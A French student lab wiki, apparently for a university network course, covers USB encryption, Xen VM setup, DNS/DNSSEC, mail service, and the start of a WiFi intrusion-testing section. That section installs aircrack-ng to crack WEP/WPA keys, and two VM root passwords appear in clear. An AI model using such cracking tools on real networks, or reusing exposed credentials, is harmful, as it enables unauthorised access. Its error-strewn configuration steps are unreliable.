Le [https://doc.ubuntu-fr.org/cryptsetup site] on peut trouver la liste des commandes necessaire pour crypter le clef USB.&lt;br /&gt;
&lt;br /&gt;
Premièrement on va formaté la clef usb pour avoir un disque propre avec la commande &amp;lt;code&amp;gt;mkfs.vfat -n 'Alex.G' -I /dev/sdb1&amp;lt;/code&amp;gt; on obtien le nom de la clef USB avec la commande &amp;lt;code&amp;gt;df -h&amp;lt;/code&amp;gt;&lt;br /&gt;
On a maintenant une clef USB clean qui a comme nom Alex.G et un format FAT32.&lt;br /&gt;
&lt;br /&gt;
On peut lancer le cryptage de la clef USB avec la commande &amp;lt;code&amp;gt;cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb&amp;lt;/code&amp;gt; Pour savoir ou les la clef USB on utilise la commande &amp;lt;code&amp;gt;lsblk&amp;lt;/code&amp;gt;&lt;br /&gt;
On choisi un mdp pour le clef USB, puis on envoie le fichier etc sur le clef pour vérifier si il est bien encrypter. Une fois la clef crypter avec un fichier dessu, on va sur un autre pc et on, vérifie si le fichier est bien crypter.&lt;br /&gt;
La liste des commande utilisé est listé ci-dessous : &lt;br /&gt;
 mount /dev/mapper/Alex.G /mnt&lt;br /&gt;
 cp -r /etc /mnt&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose Alex.G&lt;br /&gt;
&lt;br /&gt;
On peut voir que le clef USB crypter fonctionne bien.&lt;br /&gt;
[[Fichier:ClefUSBLock_2020-11-13_11-48-55.png|1000px|thumb|left|Cryptage de la clef USB]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=53933</id>
		<title>TP sysres IMA2a5 2020/2021 G5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=53933"/>
				<updated>2020-11-20T08:20:51Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : /* Réception d'un message */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système vous aurez à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé vous permettent de mettre en pratiques vos connaissances en la matière.&lt;br /&gt;
&lt;br /&gt;
=== Tableau Récapitulatif ===&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Vlan7&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|193.48.57.168&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de de la VM &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|mirage&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth06&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTP&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTPS&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation == &lt;br /&gt;
&lt;br /&gt;
Pour installer une Machine Virtuelle, il faut d'abord se connecter sur le disque de virtualisation.&lt;br /&gt;
Pour cela, il faut utiliser la commande : &lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Une fois connecter, il faut lancer la création de la Machine virtuelle avec la commande :&lt;br /&gt;
  xen-create-image --hostname=mirage --ip 193.48.57.168 --netmask=255.255.255.0 --gateway=100.64.0.5 --dist=ascii --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
L'installation prend un certain temps pour regarder si l'installation se déroule bien, on peut ouvrir un second terminale connecté en SSH a &amp;quot;capbreton&amp;quot; puis on utilise la commande : &lt;br /&gt;
 tail -f /var/log/xen-tools/mirage.0.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation, on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
     ---------------------&lt;br /&gt;
     Hostname        :  mirage&lt;br /&gt;
     Distribution    :  ascii&lt;br /&gt;
     MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
     IP Address(es)  :  dynamic&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
     Root Password   :  DgtUlOmnBFERdfarGBsopGR&lt;br /&gt;
&lt;br /&gt;
Une fois la VM créer, nous pouvons la lancer avec la commande :&lt;br /&gt;
 xl create /etc/xen/mirage.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que le VM est bien démarrer avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
Pour fonctionner l'état de la VM doit être r ou -b&lt;br /&gt;
[[Fichier:LancementVm.PNG|1000px|thumb|left|Liste des VM en fonctionnement]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On accède pour la premier fois a nottre Vm avec la commande :&lt;br /&gt;
 xl console mirage&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). &lt;br /&gt;
Après nous être logué, on change le mot de passe qui devient : glopglopglop.&lt;br /&gt;
&lt;br /&gt;
=== Configuration de la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant installer les packages que nous avons besoins : &lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get install VIM&lt;br /&gt;
&lt;br /&gt;
Il faut configurer l'adresse IP et le mask de la VM. Pour cela on utilise la commande :&lt;br /&gt;
 vim /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Dans interfaces on tajoute &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.168&lt;br /&gt;
 gateway 193.58.57.163&lt;br /&gt;
 netmask 255.255.255.248&lt;br /&gt;
&lt;br /&gt;
Pour que la machine soit joignable par SSH via l'extérieure il est nécessaire de configurer la passerelle et le ssh_config. Pour cela on utilise la commande :&lt;br /&gt;
 vi /etc/ssh/ssh_config&lt;br /&gt;
 &lt;br /&gt;
Le fichier ssh_config doit être configurer comme ci dessous :&lt;br /&gt;
 Host *&lt;br /&gt;
 SendEnv LANH LC_*&lt;br /&gt;
 HashKnownHOST yes&lt;br /&gt;
 GSSAPIAuthentification yes&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton, une paserell doit être mis en place pour pouvoir connecté les VM aux monde extérieure.&lt;br /&gt;
Pour cela on configure ces interfacte avec la commande : &lt;br /&gt;
 vim/etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Puis on configure la passerelle comem ci dessous : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
  auto lo&lt;br /&gt;
  iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
  # Physical Network Interfaces&lt;br /&gt;
  #&lt;br /&gt;
 auto eth&lt;br /&gt;
  iface eth inet static&lt;br /&gt;
    address 192.168.0.29&lt;br /&gt;
    netmask 255.255.255.0&lt;br /&gt;
    gateway 192.168.0.1&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
  iface eth0 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth1&lt;br /&gt;
  iface eth1 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth2&lt;br /&gt;
 iface eth2 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth4&lt;br /&gt;
 iface eth4 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth5&lt;br /&gt;
 iface eth5 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth6&lt;br /&gt;
 iface eth6 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth7&lt;br /&gt;
 iface eth7 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Main trunk bridge&lt;br /&gt;
 #&lt;br /&gt;
 auto Trunk&lt;br /&gt;
 iface Trunk inet manual&lt;br /&gt;
  bridge_ports eth4 eth5&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Virtual Network Interfaces&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto vlan48&lt;br /&gt;
 iface vlan48 inet static&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  address 172.26.191.21&lt;br /&gt;
  netmask 255.255.252.0&lt;br /&gt;
  gateway 172.26.191.254&lt;br /&gt;
 iface vlan48 inet6 auto&lt;br /&gt;
 &lt;br /&gt;
 auto vlan500&lt;br /&gt;
 iface vlan500 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto vlan502&lt;br /&gt;
 iface vlan502 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 # Bridge for IMA5sc group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA5sc&lt;br /&gt;
 iface IMA5sc inet manual&lt;br /&gt;
  bridge_ports eth0 eth6&lt;br /&gt;
 # Bridge for IMA2a5&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth1 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto L3MRIT&lt;br /&gt;
 iface L3MRIT inet manual&lt;br /&gt;
  bridge_ports eth2&lt;br /&gt;
 # Bridge for GIS group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto bridgeGIS&lt;br /&gt;
 iface bridgeGIS inet manual&lt;br /&gt;
  bridge_ports vlan502&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du réseau===&lt;br /&gt;
&lt;br /&gt;
==Services Internet==&lt;br /&gt;
&lt;br /&gt;
===Serveur SSH===&lt;br /&gt;
&lt;br /&gt;
On peux maintenant se connecté a la VM mirage avec la commande : &amp;lt;code&amp;gt;ssh root@193.48.57.168 -p 2222&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS===&lt;br /&gt;
Un serveur DNS (Domain Name System) permet d'effectuer correspondance entre un nom de domaine et une adresse IP. Grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP pour naviguer sur Ethernet. Pour installer notre propre serveur DNS nous avons utilisé Bind9.&lt;br /&gt;
&lt;br /&gt;
Nous commençons tout d'abord par installer bind9 via la commande suivante : &amp;lt;code&amp;gt;apt-get install bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Création et configuration named.conf.local ====&lt;br /&gt;
Le &amp;lt;code&amp;gt;named.conf.local&amp;lt;/code&amp;gt; permet de faire pointer un nom de domaine pleinement qualifié (FQDN fully qualified domain name) sur une adresse IP. &lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abbord modifié le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; qui contient la configuration DNS et y déclaré les zones associées au domaine ainsi qu'un fichier de description de la zone.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-config-named.conf.local.png|1000px|thumb|left|Configuration de mirage]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis créé le fichier de configuration appelé &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt; avec la commande &amp;lt;code&amp;gt;vim /etc/bind/glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Configuration_bind9.png|1000px|thumb|left|Configuration de bind9]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On relance le service 'bind9' avec la commande :&amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On vérifie que le DNS fonctionne bien avec le commande &amp;lt;code&amp;gt;host dns1.glopglop.site localhost&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Dns1.glopglop.site_2020-11-13_08-57-52.png|1000px|thumb|left|Vérification du DNS en local]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
Le DNS fonctionne donc bien.&lt;br /&gt;
&lt;br /&gt;
==== Configuration gandi.net ====&lt;br /&gt;
Grâce au registrar gandi.net, nous avons réservé le nom de domaine &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt;. L'extension &amp;lt;code&amp;gt;.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Gandi-glopglop-VueGeneral.PNG|1000px|thumb|left|Image de la configuration de Gandi]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter un &amp;quot;glue record&amp;quot; qui est un enregistrement collé. Il permet d'associer un nom d'hôte avec une adresse IP au registre.&lt;br /&gt;
Glue records fournis par gandi pour associer un hostname (nom de serveur ou DNS) à l'adresse IP de notre machine. Les modifications seront effectives entre 12 et 24 heures.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-Ajoue-GlueRecord.PNG|1000px|thumb|left|Image de la configuration de Gandi avec Glue Record]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le &amp;quot;glue record&amp;quot; renseigner se qui va lié nottre dns a une ip, il faur renseigner les serveur de non. cela prend 27/72h.&lt;br /&gt;
Il faut bien faire attention que la VM soit correctement configurer avec 'bind9' car c'est lui qui donne IPv4 et IPv6 correspondant à vos noms de machines. Si ce n'est pas le cas gandi ne pourras pas liée les dns a l'ip de la machine.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:GandiDNS_2020-11-13_09-00-16.png|1000px|thumb|left|DNS sur GANDI]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois les serveuyrs de non configurer, on peux fermer GANDI.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
Premièrement, on ajoute &amp;lt;code&amp;gt;l'obtion dnssec-enable yes;&amp;lt;/code&amp;gt; dans le fichier &amp;lt;code&amp;gt;named.conf.options&amp;lt;/code&amp;gt;.&lt;br /&gt;
====Génération des clef asymétrique====&lt;br /&gt;
Il est important de bien sauvegarder la clef privée, sinon nottre système de clef ne fonctionnera pas.&lt;br /&gt;
pour commancer, on crée un repertoire pour stocker les clef.&lt;br /&gt;
  cd /etc/bind&lt;br /&gt;
  mkdir glopglop.site.dnssec&lt;br /&gt;
  cd glopglop.site.dnssec/&lt;br /&gt;
&lt;br /&gt;
Une fois dans le dossier &amp;lt;code&amp;gt;glopglop.site.dnssec&amp;lt;/code&amp;gt;, on crée les clefs avec la commande&amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair...............+++++ ..........................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+15337&lt;br /&gt;
&lt;br /&gt;
On crée ensuite le clef asymétrique pour la signature des enregistrements, pour cela on utilise la commande &amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair................+++++ ..................................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+55608&lt;br /&gt;
&lt;br /&gt;
On a bien maintenant la paire de clef privée/publique. Le problème est qu'il est difficile de les distinguer avec leurs nom compliquer, il faut donc les rennomer pouyr plus de transparance.&lt;br /&gt;
On renomme donc les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);&lt;br /&gt;
&lt;br /&gt;
 mv Kglopglop.site.+005+15337.key glopglop.site-ksk.key&lt;br /&gt;
 mv Kglopglop.site.+005+15337.private glopglop.site-ksk.private&lt;br /&gt;
 mv Kglopglop.site.+005+55608.key glopglop.site-zsk.key&lt;br /&gt;
 mv Kglopglop.site.+005+55608.private glopglop.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ClefPrivéePublique_2020-11-13_09-23-42.png|1000px|thumb|left|Clef Privée et Public]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;code&amp;gt;db.glopglop.site&amp;lt;/code&amp;gt; on ajoute les deux lignes ci-dessous : &lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-ksk.key&lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe la zone d'enregistremment avec la commande &amp;lt;code&amp;gt;dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|Generation des zones d'enregistrement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les clef sont maintenant fonctionelle il faut donc les ajouter a GANDI, pour cela on se connecte a gandi puis on ajoute une clef KSK.&lt;br /&gt;
pour obtenir la cled on utilise la commande &amp;lt;code&amp;gt;cat glopglop.site-ksk.key&amp;lt;/code&amp;gt; on obtien le résultat ci-dessous : &lt;br /&gt;
 ; This is a key-signing key, keyid 15337, for glopglop.site.&lt;br /&gt;
 ; Created: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Publish: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Activate: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 glopglop.site. IN DNSKEY 257 3 5 AwEAAc3TCJkWFGnZSj/Q364AF7n69UaXum/no+LuEbXbGjTXLETdYk+Q gVAmIpvbJXcG0rucJTbVFaHr8IhWqf7VvkCbEGAORAkzBVXThPDR1pZR lJDEY88Lb2T6k9uHw43l2oP8vPev2eIRbU3VxUuJs++elgj32DTBA+yK p++/gz29H6PQVpkHnH81RjGdV+K1RZEwxkuev2MmB329fhMRwTsbW0BV aeXc5faRk9ZEKb7tr0p7txVv4wZEL6it01ZiNyGktwLRj8ln+cQz1GtC PY/UWnCtamycE/2k4f98sdDa6TMiguuBNOPug+ODzqGiI7LNUyF4jBbf 6NAgChwITps=&lt;br /&gt;
&lt;br /&gt;
On ajoute la clef a gandi comme montrer ci-dessous en n'oubliant pas de selectionner '5(RSA/SHA-1'.&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|gandi enregistrement de la clef KSK]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que tout fonctionne correctement, on va sur le site 'dnsvizi.net' il nous permet d'analyser le dns et représanter la chaine d'autentification DNSSEC.&lt;br /&gt;
[[Fichier:DNSSEC_2020-11-13_11-59-06.png|1000px|thumb|left|Test du DNSSEC]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que maintenant on a bien le statu 'SECURE' donc tout fonctionne bien.&lt;br /&gt;
&lt;br /&gt;
===Installation d'une méchagerie===&lt;br /&gt;
====Configuration de Postfix====&lt;br /&gt;
Pour recevoir le mail de vérfication de GANDI il faut sur la VM un gestionnaire de mail il faut installer mutt et postfix. On utilise les commandes ci-dessous : &lt;br /&gt;
 apt-get install postfix&lt;br /&gt;
 ant-get install mutt&lt;br /&gt;
&lt;br /&gt;
A l'installation de 'postfix' un fenètre de configuration s'ouver. &lt;br /&gt;
Il faut renseigner le non du site comme 'System mail name : 'glopglop.site'&lt;br /&gt;
&lt;br /&gt;
On vérifie la configuration de 'postix' en allant dans le 'main.cf'&lt;br /&gt;
 vi /etc/postfix/main.cf &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Config Postfix mirage.png|1000px|thumb|left|Configuration de postfix]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On a bien le non de domaine 'glopglop.site' on peut relancer 'postfix'&lt;br /&gt;
 service postfix restart&lt;br /&gt;
Si le service n'est pas configurer correctement, on peut le reconfigurer avec la commande &amp;lt;code&amp;gt;dpkg-reconfigure postfix&amp;lt;/code&amp;gt;&lt;br /&gt;
====Réception d'un message====&lt;br /&gt;
On peux testé la reception de message en envoyant un message a 'roor@glopglop.site'&lt;br /&gt;
Si tout fonctionne bien, on peux visualisé les méssage recu en tappant la commande &amp;lt;code&amp;gt;mutt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Reception_messages_mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on constate que on resoit bien les message en provenance du mail de Polytech.&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Description ===&lt;br /&gt;
Un ordinateur portable et une clef Wifi est fourni par Monsieur Redon. Pour que le clef fonctionne il est nécessite pas nécessairement de la configuration. Il faut aussi installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA &lt;br /&gt;
&lt;br /&gt;
=== Installation de la clef Wifi ===&lt;br /&gt;
Avec la commande &amp;lt;code&amp;gt;lsusb&amp;lt;/code&amp;gt; on peux voir la list des interfaces connecté aux pc. Ci-dessous les résultats obtenu.&lt;br /&gt;
&lt;br /&gt;
 Bus 003 Device 004: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter&lt;br /&gt;
 Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub&lt;br /&gt;
 Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 001 Device 004: ID 413c:2003 Dell Computer Corp. Keyboard&lt;br /&gt;
 Bus 001 Device 003: ID 046d:c016 Logitech, Inc. Optical Wheel Mouse&lt;br /&gt;
 Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
&lt;br /&gt;
La clef ubs Wifi est bien détécter.&lt;br /&gt;
On doit donc installer le pilote pour les clef usb RT5370 avec la commande :&lt;br /&gt;
 apt-get install firmware-ralink&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
Une fois les pilotes installer, on récupéère le nom de l'interface wifi avec la commande &amp;lt;code&amp;gt;ip l&amp;lt;/code&amp;gt; et on récupère le résultat ci-dessous : &lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:22:4d:7a:f1:c3 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 5: bridge: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 6: vmnet1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 7: vmnet8: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 8: wlx40a5ef059784: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 40:a5:ef:05:97:84 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
&lt;br /&gt;
La clef wifi s'apelle donc &amp;lt;code&amp;gt;wlx40a5ef059784&amp;lt;/code&amp;gt; on fait maintenant un &amp;lt;code&amp;gt; ip link set wlx40a5ef059784 up&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec la comande &amp;lt;code&amp;gt;dmsg&amp;lt;/code&amp;gt; on vérifie que la clef wifi fonctionne bien. &lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il faut de taper la commande :&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
